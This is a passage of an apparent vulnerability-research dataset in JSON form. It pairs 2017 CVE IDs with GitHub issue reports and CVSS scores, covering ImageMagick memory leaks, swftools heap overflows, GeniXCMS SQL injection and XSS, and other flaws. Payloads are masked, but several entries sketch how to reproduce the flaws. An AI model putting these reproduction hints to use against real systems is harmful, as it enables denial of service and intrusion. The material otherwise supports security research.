adfa in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG af NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG adfa in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG ae6a in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG ae6a in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG APITAG NUMBERTAG b9b in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG dc in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG dc in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG aa NUMBERTAG in APITAG APITAG NUMBERTAG cb8 in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG dc in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG aa NUMBERTAG in APITAG APITAG NUMBERTAG d0f in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG dc in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-8354",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/451",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/451",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-04-26T16:48:51Z",
        "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8cd NUMBERTAG b6b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG aa NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f8ccb6c5b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-8355",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/450",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/450",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-04-26T16:47:58Z",
        "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG f NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG ff0d0 in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-8356",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/449",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/449",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-04-26T16:47:10Z",
        "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG c NUMBERTAG c1b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG bc2e in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG bdad0b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-8357",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/453",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/453",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-04-26T16:50:06Z",
        "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fc NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG cc1 in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fc NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fc NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fc NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-8368",
        "Issue_Url_old": "https://github.com/SublimeTextIssues/Core/issues/1700",
        "Issue_Url_new": "https://github.com/sublimehq/sublime_text/issues/1700",
        "Repo_new": "sublimehq/sublime_text",
        "Issue_Created_At": "2017-05-01T17:00:58Z",
        "description": "A Denial of Service Vulnerablity( CVETAG ) in Sublime Text NUMBERTAG Build NUMBERTAG I found this vulnerablity and you should fix it. The Common Vulnerabilities and Exposures (CVE) project has assigned the ID CVETAG to this issue. Summary Sublime Text NUMBERTAG Build NUMBERTAG might allow user assisted attackers to execute code via a crafted file. Expected behavior Follow the commands in APITAG to reproduce\" Actual behavior Crash Steps to reproduce Details and Proof of Concept will be sent by a proper contact way if you can provide it for me but these will not be post here since it is Not fixed yet. Environment Windows NUMBERTAG Sublime Text: Build NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-8376",
        "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/72",
        "Issue_Url_new": "https://github.com/semplon/genixcms/issues/72",
        "Repo_new": "semplon/genixcms",
        "Issue_Created_At": "2017-04-25T03:53:19Z",
        "description": "SQL Injection in version NUMBERTAG I find a SQL injection at PATHTAG line NUMBERTAG APITAG Go URLTAG , find a menus and click del button. Change the position of menuid and token, change menuid into : APITAG exp: APITAG FILETAG BTW: could i request this for a CVE?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-8382",
        "Issue_Url_old": "https://github.com/Admidio/admidio/issues/612",
        "Issue_Url_new": "https://github.com/admidio/admidio/issues/612",
        "Repo_new": "admidio/admidio",
        "Issue_Created_At": "2017-05-15T10:06:19Z",
        "description": "CSRF in Admidio NUMBERTAG Hello, I would like to report a vulnerability that I have found on Admidio NUMBERTAG in which Cross Site Request Forgery (CSRF) attack is possible. For details please go through attached document. FILETAG Regards, Faiz Ahmed Zaidi",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 4.5,
        "impactScore": 3.6,
        "exploitabilityScore": 0.9
    },
    {
        "CVE_ID": "CVE-2017-8400",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/13",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/13",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2017-04-26T13:02:19Z",
        "description": "Segmentation Fault:out of bound write of heap data issue can occur in function APITAG Recently, I found an out of bound issue in the newest branch of swftools which can cause the segmentation fault. This issue can be caused by a malformed PNG file though png2swf. Attackers could exploit this issue to result n APITAG and might cause arbitrary code execution. The crash infomation is as follows. compiled normally $ analysis ./png2swf test FILETAG NUMBERTAG segmentation fault ./png2swf test FILETAG compiled with CFLAGS=\u2019 fsanitize=address\u2019 $ analysis ./png2swf dbg FILETAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG at pc NUMBERTAG a3fa bp NUMBERTAG fffe NUMBERTAG sp NUMBERTAG fffe NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG b NUMBERTAG thread T NUMBERTAG a3f9 in png_load PATHTAG NUMBERTAG e in APITAG PATHTAG NUMBERTAG af7d in main PATHTAG NUMBERTAG f NUMBERTAG a8c NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG b NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG b NUMBERTAG in malloc ( PATHTAG NUMBERTAG d NUMBERTAG in png_load PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG png_load Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fffb NUMBERTAG c NUMBERTAG fffb NUMBERTAG c NUMBERTAG fffb NUMBERTAG c NUMBERTAG fffb NUMBERTAG c NUMBERTAG fffb NUMBERTAG c NUMBERTAG fffb6a0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffb6b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffb6c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffb6d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffb6e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffb6f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING The attachment is the zip package of APITAG and a brief analysis. APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-8401",
        "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/14",
        "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/14",
        "Repo_new": "matthiaskramm/swftools",
        "Issue_Created_At": "2017-04-26T15:53:51Z",
        "description": "Segmentation Fault:An out of bound read of heap data issue can occur in function APITAG An out of bound read of heap data issue can occur in function APITAG This issue can be caused by a malformed PNG file though png2swf. Attackers could exploit this issue to result in APITAG compiled normally \u279c analysis ./png2swf test FILETAG NUMBERTAG segmentation fault ./png2swf test FILETAG compiled with CFLAGS=\u2019 APITAG \u279c analysis ./png2swf dbg FILETAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG c bp NUMBERTAG ffdf NUMBERTAG becc0 sp NUMBERTAG ffdf NUMBERTAG becb0 READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG b in png_load PATHTAG NUMBERTAG e in APITAG PATHTAG NUMBERTAG af7d in main PATHTAG NUMBERTAG f5fefa8e NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the left of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f5ff NUMBERTAG in malloc ( PATHTAG NUMBERTAG bd in png_load PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG png_load Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff8cd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8ce0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8cf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa NUMBERTAG c NUMBERTAG fff8d NUMBERTAG c NUMBERTAG fff8d NUMBERTAG c NUMBERTAG fff8d NUMBERTAG c NUMBERTAG fff8d NUMBERTAG c NUMBERTAG fff8d NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING The attachment is the APITAG and a brief report. APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-8418",
        "Issue_Url_old": "https://github.com/bbatsov/rubocop/issues/4336",
        "Issue_Url_new": "https://github.com/rubocop/rubocop/issues/4336",
        "Repo_new": "rubocop/rubocop",
        "Issue_Created_At": "2017-05-01T16:33:53Z",
        "description": "Insecure use of /tmp. Actual behavior APITAG uses APITAG to store cache files insecurely. Malicious local users could exploit this to tamper with cache files belonging to other users. Expected behavior APITAG should not abuse APITAG for cache. Please consider adopting FILETAG , which says cache should be stored in APITAG or APITAG . Steps to reproduce the problem Proof of concept exploit: ERRORTAG APITAG version NUMBERTAG using Parser NUMBERTAG running on ruby NUMBERTAG i NUMBERTAG linux gnu)",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
        "severity": "LOW",
        "baseScore": 3.3,
        "impactScore": 1.4,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-8458",
        "Issue_Url_old": "https://github.com/brave/browser-laptop/issues/4748",
        "Issue_Url_new": "https://github.com/brave/browser-laptop/issues/4748",
        "Repo_new": "brave/browser-laptop",
        "Issue_Created_At": "2016-10-13T19:30:20Z",
        "description": "APITAG report: URL obfuscation. URLTAG Verified on OS NUMBERTAG Steps to Reproduce NUMBERTAG go to FILETAG NUMBERTAG urlbar makes it look like we are at brave.com when the page displayed is example.com Expected behavior urlbar should show the actual page location, which is FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-8762",
        "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/73",
        "Issue_Url_new": "https://github.com/semplon/genixcms/issues/73",
        "Repo_new": "semplon/genixcms",
        "Issue_Created_At": "2017-05-03T18:38:11Z",
        "description": "XSS in APITAG NUMBERTAG latest). Register a user and submit a page, which contents xss payload APITAG APITAG When the administrator into the background to view this page, XSS will take effect. APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-8763",
        "Issue_Url_old": "https://github.com/Telaxus/EPESI/issues/182",
        "Issue_Url_new": "https://github.com/telaxus/epesi/issues/182",
        "Repo_new": "Telaxus/EPESI",
        "Issue_Created_At": "2017-05-02T11:03:08Z",
        "description": "Cross Site Scripting . file: FILETAG code: APITAG poc: APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-8765",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/466",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/466",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-05-03T08:36:29Z",
        "description": "memory leak in APITAG APITAG NUMBERTAG magick identify $FILE When identify icon file, imagemagick will allocate memory to store colormap in function APITAG in coders\\icon.c, line NUMBERTAG if APITAG >colors,exception) == APITAG image >colors can be controlled, as it is assigned as follow(line NUMBERTAG if APITAG NUMBERTAG APITAG APITAG APITAG image APITAG //can be controlled if (image >colors NUMBERTAG image >colors=one << APITAG } APITAG is diretly from icon file without checking( line NUMBERTAG APITAG //can be controlled by modify icon file So, modifying the number_colors can cause APITAG to allocate a anysize amount of memory, this may cause a memory exhaustion Reproducer: Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-8780",
        "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/74",
        "Issue_Url_new": "https://github.com/semplon/genixcms/issues/74",
        "Repo_new": "semplon/genixcms",
        "Issue_Created_At": "2017-05-04T05:21:59Z",
        "description": "Comment XSS. Leave a comment with payload: APITAG aaaa</p if admin publish this comment, it will effect.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2017-8799",
        "Issue_Url_old": "https://github.com/irods/irods/issues/3452",
        "Issue_Url_new": "https://github.com/irods/irods/issues/3452",
        "Repo_new": "irods/irods",
        "Issue_Created_At": "2017-01-20T18:54:36Z",
        "description": "igetwild bash cleanup.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-8825",
        "Issue_Url_old": "https://github.com/dinhviethoa/libetpan/issues/274",
        "Issue_Url_new": "https://github.com/dinhvh/libetpan/issues/274",
        "Repo_new": "dinhvh/libetpan",
